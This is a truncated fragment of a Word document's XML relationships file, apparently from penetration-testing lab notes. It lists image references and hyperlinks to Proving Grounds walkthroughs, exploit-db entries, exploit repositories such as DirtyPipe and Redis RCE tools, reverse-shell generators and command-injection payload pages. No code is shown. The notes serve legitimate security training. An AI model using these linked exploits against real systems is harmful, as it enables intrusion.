TargetMode="External"/><Relationship Id="rId1157" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://belcyber.medium.com/dc-9-walkthrough-vulnhub-b87a63c7d6f9" TargetMode="External"/><Relationship Id="rId1147" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/X0RW3LL/XenSpawn.git" TargetMode="External"/><Relationship Id="rId1389" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId1148" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://spawn.sh" TargetMode="External"/><Relationship Id="rId1149" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits" TargetMode="External"/><Relationship Id="rId316" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/besimorhino/powercat" TargetMode="External"/><Relationship Id="rId558" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image368.png"/><Relationship Id="rId315" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://stackoverflow.com/users/4003407/user4003407" TargetMode="External"/><Relationship Id="rId557" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image140.png"/><Relationship Id="rId799" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@0xrave/cockpit-proving-ground-practice-walkthrough-c95930e9523d" TargetMode="External"/><Relationship Id="rId314" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://stackoverflow.com/users/4003407/user4003407" TargetMode="External"/><Relationship Id="rId556" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image522.png"/><Relationship Id="rId798" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://crontab.guru/" TargetMode="External"/><Relationship Id="rId313" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmd" TargetMode="External"/><Relationship Id="rId555" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId797" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://crontab.guru/" TargetMode="External"/><Relationship Id="rId319" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@vivek-kumar/offensive-security-proving-grounds-walk-through-authby-7d0391b0897c" TargetMode="External"/><Relationship Id="rId318" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://revshells.com" TargetMode="External"/><Relationship Id="rId317" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/besimorhino/powercat" TargetMode="External"/><Relationship Id="rId559" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image331.png"/><Relationship Id="rId1380" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@Fasil713/fish-pg-walkthrough-e844a4f5c4bf" TargetMode="External"/><Relationship Id="rId550" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image493.png"/><Relationship Id="rId792" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image139.png"/><Relationship Id="rId1381" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/45387" TargetMode="External"/><Relationship Id="rId791" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image180.png"/><Relationship Id="rId1140" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image178.png"/><Relationship Id="rId1382" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.google.com/document/d/1eQuumOf-4w7p0vGKRx-f9MmRgVOLEM2Ra5TsvgJv4h0/edit?usp=sharing" TargetMode="External"/><Relationship Id="rId790" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image175.png"/><Relationship Id="rId1141" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.sublimetext.com/docs/linux_repositories.html" TargetMode="External"/><Relationship Id="rId1383" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/48818" TargetMode="External"/><Relationship Id="rId1142" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/48793" TargetMode="External"/><Relationship Id="rId1384" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.google.com/document/d/12DXL3Nczy0m3E8wH0nIzTWTMNUeCWNXsjHCMxse9w3Q/edit?usp=sharing" TargetMode="External"/><Relationship Id="rId312" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmd" TargetMode="External"/><Relationship Id="rId554" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image491.png"/><Relationship Id="rId796" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image183.png"/><Relationship Id="rId1143" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@ardian.danny/oscp-practice-series-72-proving-grounds-sybaris-b362f337365c" TargetMode="External"/><Relationship Id="rId1385" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.shielder.com/advisories/pgadmin-path-traversal_leads_to_unsafe_deserialization_and_rce/" TargetMode="External"/><Relationship Id="rId311" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gitforwindows.org/" TargetMode="External"/><Relationship Id="rId553" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image360.png"/><Relationship Id="rId795" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image55.png"/><Relationship Id="rId1144" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://edbertsumicad.medium.com/pg-workaholic-privilege-escalation-via-misconfigured-plugin-loader-assume-breach-355a869b2efd" TargetMode="External"/><Relationship Id="rId1386" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/brightio/penelope" TargetMode="External"/><Relationship Id="rId310" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gitforwindows.org/" TargetMode="External"/><Relationship Id="rId552" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@Dpsypher/proving-grounds-practice-slort-2294f5ddde5b" TargetMode="External"/><Relationship Id="rId794" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image284.png"/><Relationship Id="rId1145" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image42.png"/><Relationship Id="rId1387" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image350.png"/><Relationship Id="rId551" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image205.png"/><Relationship Id="rId793" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image97.png"/><Relationship Id="rId1146" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/X0RW3LL/XenSpawn?tab=readme-ov-file" TargetMode="External"/><Relationship Id="rId1388" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://vimschool.netlify.app/introduction/" TargetMode="External"/><Relationship Id="rId297" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image86.png"/><Relationship Id="rId296" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image484.png"/><Relationship Id="rId295" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@gayemans1003/offsec-proving-grounds-zab-walkthrough-4092a2c8c904" TargetMode="External"/><Relationship Id="rId294" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId299" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image155.png"/><Relationship Id="rId298" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image154.png"/><Relationship Id="rId271" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image105.png"/><Relationship Id="rId270" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://curl.se/" TargetMode="External"/><Relationship Id="rId269" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://curl.se/" TargetMode="External"/><Relationship Id="rId264" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.google.com/document/d/10ugNp-zMcFSfdEFCT0rB4VSvBa-1wYGH5r9UAtuQADA/edit?usp=sharing" TargetMode="External"/><Relationship Id="rId263" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image200.png"/><Relationship Id="rId262" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://viperone.gitbook.io/pentest-everything/writeups/pg-practice/linux/sorcerer" TargetMode="External"/><Relationship Id="rId261" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image444.png"/><Relationship Id="rId268" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/burp" TargetMode="External"/><Relationship Id="rId267" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/burp" TargetMode="External"/><Relationship Id="rId266" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image261.png"/><Relationship Id="rId265" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://infosecwriteups.com/proving-grounds-practice-dvr4-walkthrough-b97374d3733f" TargetMode="External"/><Relationship Id="rId260" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image69.png"/><Relationship Id="rId259" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image456.png"/><Relationship Id="rId258" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.google.com/document/d/12DXL3Nczy0m3E8wH0nIzTWTMNUeCWNXsjHCMxse9w3Q/edit?usp=sharing" TargetMode="External"/><Relationship Id="rId253" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://launchpad.net/ubuntu/+source/openssh" TargetMode="External"/><Relationship Id="rId495" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image534.png"/><Relationship Id="rId252" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image177.png"/><Relationship Id="rId494" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image430.png"/><Relationship Id="rId251" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://unix.stackexchange.com/questions/577402/ssh-error-while-logging-in-using-private-key-loaded-pubkey-invalid-format-and" TargetMode="External"/><Relationship Id="rId493" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Web_shell" TargetMode="External"/><Relationship Id="rId250" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image501.png"/><Relationship Id="rId492" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Web_shell" TargetMode="External"/><Relationship Id="rId257" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@vivek-kumar/offensive-security-proving-grounds-walk-through-roquefort-e61052190965" TargetMode="External"/><Relationship Id="rId499" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image104.png"/><Relationship Id="rId256" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image285.png"/><Relationship Id="rId498" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://sqlmap.org/" TargetMode="External"/><Relationship Id="rId255" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@z6157881/evilbox-one-vulnhub-walkthrough-e60d723c7639" TargetMode="External"/><Relationship Id="rId497" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://sqlmap.org/" TargetMode="External"/><Relationship Id="rId254" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://launchpad.net/ubuntu/+source/openssh" TargetMode="External"/><Relationship Id="rId496" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://banua.medium.com/proving-grounds-butch-oscp-prep-2025-practice-14-74a0857cf4bd" TargetMode="External"/><Relationship Id="rId293" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@Inching-Towards-Intelligence/pg-play-noname-e9504220ae31" TargetMode="External"/><Relationship Id="rId292" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cyberarri.com/2024/06/23/shakabrah-pg-play-writeup/" TargetMode="External"/><Relationship Id="rId291" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection" TargetMode="External"/><Relationship Id="rId290" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection" TargetMode="External"/><Relationship Id="rId286" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/iis/configuration/system.applicationhost/applicationpools" TargetMode="External"/><Relationship Id="rId285" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/iis/configuration/system.applicationhost/applicationpools" TargetMode="External"/><Relationship Id="rId284" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/iis/manage/configuring-security/application-pool-identities" TargetMode="External"/><Relationship Id="rId283" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/iis/manage/configuring-security/application-pool-identities" TargetMode="External"/><Relationship Id="rId289" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image272.png"/><Relationship Id="rId288" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Ssh-keygen" TargetMode="External"/><Relationship Id="rId287" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Ssh-keygen" TargetMode="External"/><Relationship Id="rId282" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image435.png"/><Relationship Id="rId281" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image287.png"/><Relationship Id="rId280" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image56.png"/><Relationship Id="rId275" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image312.png"/><Relationship Id="rId274" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image167.png"/><Relationship Id="rId273" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image483.png"/><Relationship Id="rId272" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image480.png"/><Relationship Id="rId279" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image217.png"/><Relationship Id="rId278" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Google_Drive" TargetMode="External"/><Relationship Id="rId277" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Google_Drive" TargetMode="External"/><Relationship Id="rId276" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image307.png"/><Relationship Id="rId907" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://linux.die.net/man/8/mount" TargetMode="External"/><Relationship Id="rId906" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image536.png"/><Relationship Id="rId905" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://man7.org/linux/man-pages/man1/find.1.html" TargetMode="External"/><Relationship Id="rId904" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://man7.org/linux/man-pages/man1/find.1.html" TargetMode="External"/><Relationship Id="rId909" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://geek-university.com/linux/etc-fstab-file" TargetMode="External"/><Relationship Id="rId908" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://linux.die.net/man/8/mount" TargetMode="External"/><Relationship Id="rId903" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image514.png"/><Relationship Id="rId902" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://linux.die.net/man/8/rpm" TargetMode="External"/><Relationship Id="rId901" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://linux.die.net/man/8/rpm" TargetMode="External"/><Relationship Id="rId900" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://linux.die.net/man/1/dpkg" TargetMode="External"/><Relationship Id="rId929" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Session_(computer_science)" TargetMode="External"/><Relationship Id="rId928" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image330.png"/><Relationship Id="rId927" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://webhook.site" TargetMode="External"/><Relationship Id="rId926" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/cross-site-scripting" TargetMode="External"/><Relationship Id="rId921" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://man7.org/linux/man-pages/man7/daemon.7.html" TargetMode="External"/><Relationship Id="rId920" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://man7.org/linux/man-pages/man7/daemon.7.html" TargetMode="External"/><Relationship Id="rId925" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image479.png"/><Relationship Id="rId924" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://man7.org/linux/man-pages/man7/raw.7.html" TargetMode="External"/><Relationship Id="rId923" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://man7.org/linux/man-pages/man7/raw.7.html" TargetMode="External"/><Relationship Id="rId922" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image128.png"/><Relationship Id="rId918" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image102.png"/><Relationship Id="rId917" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image423.png"/><Relationship Id="rId916" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image132.png"/><Relationship Id="rId915" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image382.png"/><Relationship Id="rId919" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image387.png"/><Relationship Id="rId910" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://geek-university.com/linux/etc-fstab-file" TargetMode="External"/><Relationship Id="rId914" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image299.png"/><Relationship Id="rId913" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://linux.die.net/man/8/lsblk" TargetMode="External"/><Relationship Id="rId912" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://linux.die.net/man/8/lsblk" TargetMode="External"/><Relationship Id="rId911" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image498.png"/><Relationship Id="rId1213" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image359.png"/><Relationship Id="rId1214" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/48779" TargetMode="External"/><Relationship Id="rId1215" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/48779" TargetMode="External"/><Relationship Id="rId1216" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image537.png"/><Relationship Id="rId1217" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image392.png"/><Relationship Id="rId1218" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@haadimdwork/glasgow-smile-1-proving-groundswalkthrough-521b2fee1317" TargetMode="External"/><Relationship Id="rId1219" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@Dpsypher/proving-grounds-practice-internal-e5098dd29793" TargetMode="External"/><Relationship Id="rId629" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=yTHtLi9YZ2s&amp;t=2865s" TargetMode="External"/><Relationship Id="rId624" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/OpenCL" TargetMode="External"/><Relationship Id="rId866" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@0xrave/readys-proving-grounds-practice-walkthrough-88a3e0e21f62" TargetMode="External"/><Relationship Id="rId623" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/OpenCL" TargetMode="External"/><Relationship Id="rId865" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/n0b0dyCN/RedisModules-ExecuteCommand" TargetMode="External"/><Relationship Id="rId622" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image363.png"/><Relationship Id="rId864" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Ridter/redis-rce" TargetMode="External"/><Relationship Id="rId621" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hashes.com/en/tools/hash_identifier" TargetMode="External"/><Relationship Id="rId863" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@ardian.danny/oscp-practice-series-9-proving-grounds-wombo-facdbcf2ef18" TargetMode="External"/><Relationship Id="rId628" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Bcrypt" TargetMode="External"/><Relationship Id="rId627" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Bcrypt" TargetMode="External"/><Relationship Id="rId869" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@C4berowl/readys-write-up-proving-grounds-e066074eed" TargetMode="External"/><Relationship Id="rId626" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.nvidia.com/cuda-toolkit" TargetMode="External"/><Relationship Id="rId868" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Ridter/redis-rce" TargetMode="External"/><Relationship Id="rId625" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.nvidia.com/cuda-toolkit" TargetMode="External"/><Relationship Id="rId867" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Ridter/redis-rce" TargetMode="External"/><Relationship Id="rId620" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image474.png"/><Relationship Id="rId862" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/n0b0dyCN/redis-rogue-server/blob/master/exp.so" TargetMode="External"/><Relationship Id="rId861" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Ridter/redis-rce" TargetMode="External"/><Relationship Id="rId1210" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/meetcyber/proving-grounds-my-cmsms-walkthrough-intermediate-4648b51361f0" TargetMode="External"/><Relationship Id="rId860" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@0xrave/wombo-proving-ground-practice-walkthrough-c60f1ce7223f" TargetMode="External"/><Relationship Id="rId1211" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cmscanbesimple.org/blog/cms-made-simple-admin-password-recovery" TargetMode="External"/><Relationship Id="rId1212" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cmscanbesimple.org/blog/cms-made-simple-admin-password-recovery" TargetMode="External"/><Relationship Id="rId1202" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@d3mi/vegeta1-offsec-proving-grounds-acd77f1b5b61" TargetMode="External"/><Relationship Id="rId1203" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://morsecode.world/international/decoder/audio-decoder-adaptive.html" TargetMode="External"/><Relationship Id="rId1204" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://morsecode.world/international/decoder/audio-decoder-adaptive.html" TargetMode="External"/><Relationship Id="rId1205" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://sourceforge.net/projects/election-by-tripath/" TargetMode="External"/><Relationship Id="rId1206" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@zeroDaykt/election1-proving-grounds-play-walkthrough-2c35b07844ec" TargetMode="External"/><Relationship Id="rId1207" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@zeroDaykt/election1-proving-grounds-play-walkthrough-2c35b07844ec" TargetMode="External"/><Relationship Id="rId1208" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/47173?source=post_page-----2c35b07844ec---------------------------------------" TargetMode="External"/><Relationship Id="rId1209" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/47173" TargetMode="External"/><Relationship Id="rId619" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hashcat.net/wiki/doku.php?id=example_hashes" TargetMode="External"/><Relationship Id="rId618" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@Dpsypher/proving-grounds-practice-nickel-f76b06f60db1" TargetMode="External"/><Relationship Id="rId613" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image306.png"/><Relationship Id="rId855" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/meetcyber/proving-grounds-my-cmsms-walkthrough-intermediate-4648b51361f0" TargetMode="External"/><Relationship Id="rId612" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@ypopova3/sunsetdecoy-offsec-3734783dbfda" TargetMode="External"/><Relationship Id="rId854" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@adamforsythebartlett/scrutiny-walkthrough-proving-grounds-practice-01737dd96583" TargetMode="External"/><Relationship Id="rId611" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image402.png"/><Relationship Id="rId853" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@whitebearr82/pgpractice-linux-postfish-192-168-56-137-9a48d8577c5f" TargetMode="External"/><Relationship Id="rId610" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hashes.com/en/tools/hash_identifier" TargetMode="External"/><Relationship Id="rId852" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://viperone.gitbook.io/pentest-everything/writeups/pg-practice/linux/postfish" TargetMode="External"/><Relationship Id="rId617" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image113.png"/><Relationship Id="rId859" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@0xrave/readys-proving-grounds-practice-walkthrough-88a3e0e21f62" TargetMode="External"/><Relationship Id="rId616" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image441.png"/><Relationship Id="rId858" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image370.png"/><Relationship Id="rId615" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image407.png"/><Relationship Id="rId857" 